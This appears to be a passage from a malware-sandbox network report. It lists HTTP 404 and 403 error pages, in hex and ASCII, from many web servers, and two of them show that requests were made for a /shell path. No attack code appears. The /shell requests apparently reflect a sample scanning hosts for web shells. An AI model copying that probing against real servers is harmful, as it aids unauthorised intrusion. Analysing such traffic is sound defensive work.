Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 01 Nov 2021 09:09:49 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:47 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:50 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:39 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:52 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 00:57:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=c0e60295bcabcce8d709c8a296ecce; Path=/; HttpOnlyDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:53 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 11:16:58 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mbedthis-Appweb/2.4.2Date: Mon, 01 Nov 2021 09:09:40 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=2000Content-Type: text/htmlContent-length: 126Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: <HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD><BODY><H2>Access Error: 404 -- Not Found</H2></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:55 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 196Keep-Alive: timeout=15, max=200Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
